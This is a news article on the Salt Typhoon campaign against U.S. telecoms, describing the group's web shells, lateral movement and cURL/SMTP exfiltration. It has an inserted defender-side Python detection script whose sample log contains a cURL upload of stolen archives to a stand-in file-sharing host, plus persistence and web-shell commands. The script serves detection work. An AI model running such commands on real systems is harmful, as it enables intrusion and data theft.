Chinese Hackers Exploit T-Mobile and Other U.S. Telecoms in Broader Espionage Campaign


U.S. telecoms giant T-Mobile has confirmed that it was also among the companies that were targeted by Chinese threat actors to gain access to valuable information.

The adversaries, tracked as Salt Typhoon, breached the company as part of a “monthslong campaign” designed to harvest cellphone communications of “high-value intelligence targets.” It’s not clear what information was taken, if any, during the malicious activity.

“T-Mobile is closely monitoring this industry-wide attack, and at this time, T-Mobile systems and data have not been impacted in any significant way, and we have no evidence of impacts to customer information,” a spokesperson for the company was quoted as saying to The Wall Street Journal. “We will continue to monitor this closely, working with industry peers and the relevant authorities.”

With the latest development, T-Mobile has joined a list of major organizations like AT&T, Verizon, and Lumen Technologies that have been singled out as part of what appears to be a full-blown cyber espionage campaign.

So far, the reports make no mention of the degree to which these attacks saw success, whether any kind of malware was installed, or what kinds of information they were after. Salt Typhoon’s unauthorized access to Americans’ cellular data records was previously disclosed by Politico.

Last week, the U.S. government said its ongoing investigation into the targeting of commercial telecommunications infrastructure revealed a “broad and significant” hack orchestrated by the People’s Republic of China (PRC).

“PRC-affiliated actors have compromised networks at multiple telecommunications companies to enable the theft of customer call records data, the compromise of private communications of a limited number of individuals who are primarily involved in government or political activity, and the copying of certain information that was subject to U.S. law enforcement requests pursuant to court orders,” it said.

It further warned that the extent and scope of these compromises could grow as the probe continues.

Salt Typhoon, which is also known as Earth Estries, FamousSparrow, GhostEmperor, and UNC2286, is said to have been active since at least 2020, according to Trend Micro. In August 2023, the spy crew was linked to a series of attacks aimed at government and technology industries based in the Philippines, Taiwan, Malaysia, South Africa, Germany, and the U.S.

Analysis shows that the threat actors have methodically crafted their payloads and made use of an interesting combination of legitimate and bespoke tools and techniques to bypass defenses and maintain access to their targets.

“Earth Estries maintains persistence by continuously updating its tools and employs backdoors for lateral movement and credential theft,” Trend Micro researchers Ted Lee, Leon M Chang, and Lenart Bermejo said in an exhaustive analysis published earlier this month.

“Data collection and exfiltration are performed using Trillclient, while tools like cURL are used for sending information to anonymized file-sharing services, employing proxies to hide backdoor traffic.”

The cybersecurity company said it observed two distinct attack chains employed by the group, indicating that the tradecraft in Salt Typhoon's arsenal is as broad as it is varied. Initial access to target networks is gained by exploiting vulnerabilities in outside-facing services or remote management utilities.

In one set of attacks, the threat actor has been found taking advantage of vulnerable or misconfigured QConvergeConsole installations to deliver malware such as Cobalt Strike, a custom Go-based stealer called TrillClient, and backdoors like HemiGate and Crowdoor, a variant of SparrowDoor which has been previously put to use by another China-linked group called Tropic Trooper.

Some of the other techniques include the use of PSExec to laterally install its backdoors and tools, and TrillClient to collect user credentials from web browser user-profiles and exfiltrate them to an attacker-controlled Gmail account via the Simple Mail Transfer Protocol (SMTP) to further its objectives.

The second infection sequence, in contrast, is a lot more sophisticated, with the threat actors abusing susceptible Microsoft Exchange servers to implant the China Chopper web shell, which is then used to deliver Cobalt Strike, Zingdoor, and Snappybee (aka Deed RAT), a suspected successor to the ShadowPad malware.

“Delivery of these additional backdoors and tools is done either via a [command-and-control] server or by using cURL to download them from attacker-controlled servers,” the researchers said. “These backdoor installations are also periodically replaced and updated.”

“The collection of documents of interest is done via RAR, and they are exfiltrated using cURL, with the data being sent to anonymized file sharing services.”

Also utilized in the attacks are programs like NinjaCopy to extract credentials and PortScan for network discovery and mapping. Persistence on the host is accomplished by means of scheduled tasks.

In one case, Salt Typhoon is also believed to have repurposed a victim’s proxy server to forward traffic to the actual command-and-control (C2) server in an attempt to conceal the malicious traffic.

Trend Micro noted that one of the infected machines also harbored two additional backdoors named Cryptmerlin, which executes additional commands issued by a C2 server, and FuxosDoor, an Internet Information Services (IIS) implant that’s deployed on a compromised Exchange Server and is also designed to run commands using cmd.exe.
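As an added, defender-side illustration that is not part of the article or of Trend Micro's report, the following Python script triages constructed endpoint telemetry for the behaviours described above: an IIS worker process spawning cmd.exe (web shell on Exchange), child processes of the PsExec service (lateral tool installation), `schtasks /create` persistence, cURL uploads to a watchlist of anonymized file-sharing hosts, and SMTP connections from hosts that are not sanctioned mail relays. It then correlates findings per host so that a machine showing several stages at once is escalated first. The key=value log format, host names, the `anon-share.example` domain, the `MAIL01` allowlist and the `trill.exe` image name are all constructed assumptions, not indicators from the page.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample telemetry in a hypothetical key=value format (not a vendor schema).
# Each line is one event; quoted values may contain spaces.
SAMPLE_LOG = r"""
event=process host=EXCH01 parent=w3wp.exe image=cmd.exe cmd="cmd.exe /c whoami"
event=process host=WS07 parent=PSEXESVC.exe image=rundll32.exe cmd="rundll32.exe C:\Windows\Temp\svc.dll,Start"
event=process host=WS07 parent=cmd.exe image=schtasks.exe cmd="schtasks.exe /create /tn Updater /tr C:\Windows\Temp\u.exe /sc hourly"
event=process host=WS07 parent=cmd.exe image=curl.exe cmd="curl.exe -F file=@C:\Temp\docs.rar https://anon-share.example/upload"
event=network host=WS07 image=trill.exe dest=smtp.gmail.com:587
event=process host=WS02 parent=explorer.exe image=notepad.exe cmd="notepad.exe notes.txt"
event=network host=MAIL01 image=mailsvc.exe dest=smtp.gmail.com:587
"""

# Constructed watchlists: a placeholder file-sharing domain and the hosts permitted to send SMTP.
FILE_SHARING_HOSTS = {"anon-share.example"}
SMTP_ALLOWED_HOSTS = {"MAIL01"}
SMTP_PORTS = {"25", "465", "587"}

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


@dataclass(frozen=True)
class Finding:
    host: str
    technique: str
    evidence: str


def parse_line(line: str) -> dict[str, str]:
    """Split one key=value line into a dict; quotes around values are removed."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}


def triage(log_text: str) -> list[Finding]:
    """Flag events that match the tradecraft described in the article."""
    findings: list[Finding] = []
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if not ev:
            continue
        host = ev.get("host", "?")
        image = ev.get("image", "").lower()
        parent = ev.get("parent", "").lower()
        cmd = ev.get("cmd", "")
        if ev.get("event") == "process":
            # IIS worker process launching a shell: typical of a web shell on Exchange.
            if parent == "w3wp.exe" and image in {"cmd.exe", "powershell.exe"}:
                findings.append(Finding(host, "web shell command execution", cmd))
            # Child of the PsExec service: remote installation of tools or backdoors.
            if parent == "psexesvc.exe":
                findings.append(Finding(host, "PsExec lateral movement", cmd))
            # Scheduled task creation used for persistence.
            if image == "schtasks.exe" and "/create" in cmd.lower():
                findings.append(Finding(host, "scheduled task persistence", cmd))
            # cURL pushing data to a watchlisted anonymized file-sharing service.
            if image == "curl.exe" and any(h in cmd.lower() for h in FILE_SHARING_HOSTS):
                findings.append(Finding(host, "cURL exfiltration to file-sharing service", cmd))
        elif ev.get("event") == "network":
            # Outbound SMTP from a host that is not a sanctioned mail relay.
            dest = ev.get("dest", "")
            _, _, port = dest.rpartition(":")
            if port in SMTP_PORTS and host not in SMTP_ALLOWED_HOSTS:
                findings.append(Finding(host, "SMTP exfiltration from non-mail host", f"{image} -> {dest}"))
    return findings


def multi_stage_hosts(findings: list[Finding], min_stages: int = 2) -> set[str]:
    """Hosts showing several distinct techniques: the correlation an analyst escalates first."""
    stages: dict[str, set[str]] = {}
    for f in findings:
        stages.setdefault(f.host, set()).add(f.technique)
    return {h for h, s in stages.items() if len(s) >= min_stages}


if __name__ == "__main__":
    results = triage(SAMPLE_LOG)
    for f in results:
        print(f"{f.host:7} {f.technique:45} {f.evidence}")
    print("escalate:", sorted(multi_stage_hosts(results)))
```

On the constructed sample, the single-event rules produce five findings (one on EXCH01, four on WS07) while the benign notepad launch and the mail relay's SMTP traffic are ignored; the per-host correlation then singles out WS07, where lateral movement, persistence and two exfiltration paths appear together, which mirrors the report's point that these intrusions are recognisable less by any one tool than by the combination of stages on the same machine.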

“Our analysis of Earth Estries’ persistent TTPs in prolonged cyber operations reveals a sophisticated and adaptable threat actor that employs various tools and backdoors, demonstrating not only technical capabilities, but also a strategic approach to maintaining access and control within compromised environments,” the researchers said.

“Throughout their campaigns, Earth Estries has displayed a keen understanding of their target environments, by continually identifying exposed layers for re-entry. By using a combination of established tools and custom backdoors, they have created a multi-layered attack strategy that is difficult to detect and mitigate.”
